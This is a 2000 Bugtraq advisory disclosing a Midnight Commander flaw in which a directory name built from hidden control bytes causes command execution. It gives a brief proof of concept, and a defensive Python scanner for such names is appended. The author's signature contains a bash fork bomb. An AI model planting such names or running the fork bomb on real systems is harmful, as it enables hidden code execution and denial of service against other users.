[17813] in bugtraq


Midnight Commander

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Tue Nov 28 15:03:25 2000

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.4.10.10011280100360.925-100000@localhost>
Date:         Tue, 28 Nov 2000 01:15:51 +0100
Reply-To: Michal Zalewski <lcamtuf@TPI.PL>
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM

The Midnight Commander 4.5.51 (latest).

$ od -t x1 mcbug
0000000 03 14 77 04 0a
$ mkdir `cat mcbug`
$ mc

(try to view this directory - 'w' - 0x77 command will be executed; longer
commands might be used, as well)

Obviously, this attack requires privileged user interaction. Midnight
Commander won't display the full name of the directory if it's long enough, so
these control characters can be easily hidden.

Such problems in Midnight Commander seem to appear more or less
frequently. I am afraid this pretty useful file manager should not be
used in multiuser systems, especially by root (I can recall numerous
problems with this utility in the last years - code execution when viewing
specific file types, code execution via mc vfs support, etc. etc.) :(

Workaround: well, I am afraid only code audit might help :(

--
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=
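
Added example, not part of the original post: a defensive check that walks a directory tree and reports entries whose names contain control bytes, such as the name created from the od dump above, printing them with \xNN escapes so nothing is sent raw to the terminal. The function names and the scratch tree in demo() are assumptions constructed for illustration.

```python
import os
import tempfile

# Bytes treated as suspicious in a name: C0 controls (0x00-0x1f) and DEL (0x7f).
CONTROL = frozenset(range(0x20)) | {0x7F}


def escape_name(name: bytes) -> str:
    """Render a raw name with control, backslash and non-ASCII bytes as \\xNN."""
    return "".join(
        chr(b) if 0x20 <= b < 0x7F and b != 0x5C else f"\\x{b:02x}" for b in name
    )


def find_control_names(root: bytes):
    """Walk root as bytes (no decoding is attempted) and return
    (escaped_path, [offending byte values]) for each entry whose own
    name contains a control byte."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            bad = [b for b in name if b in CONTROL]
            if bad:
                hits.append((escape_name(os.path.join(dirpath, name)), bad))
    return hits


def demo():
    """Constructed sample: a scratch tree holding the name from the od dump.
    The shell's command substitution drops the trailing 0a, so the
    directory created by the mkdir line is the 4 bytes 03 14 77 04."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.fsencode(tmp)
        os.mkdir(os.path.join(root, b"plain"))
        os.mkdir(os.path.join(root, b"plain", bytes([0x03, 0x14, 0x77, 0x04])))
        return find_control_names(root)


if __name__ == "__main__":
    for path, bad in demo():
        print(path, [hex(b) for b in bad])
```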
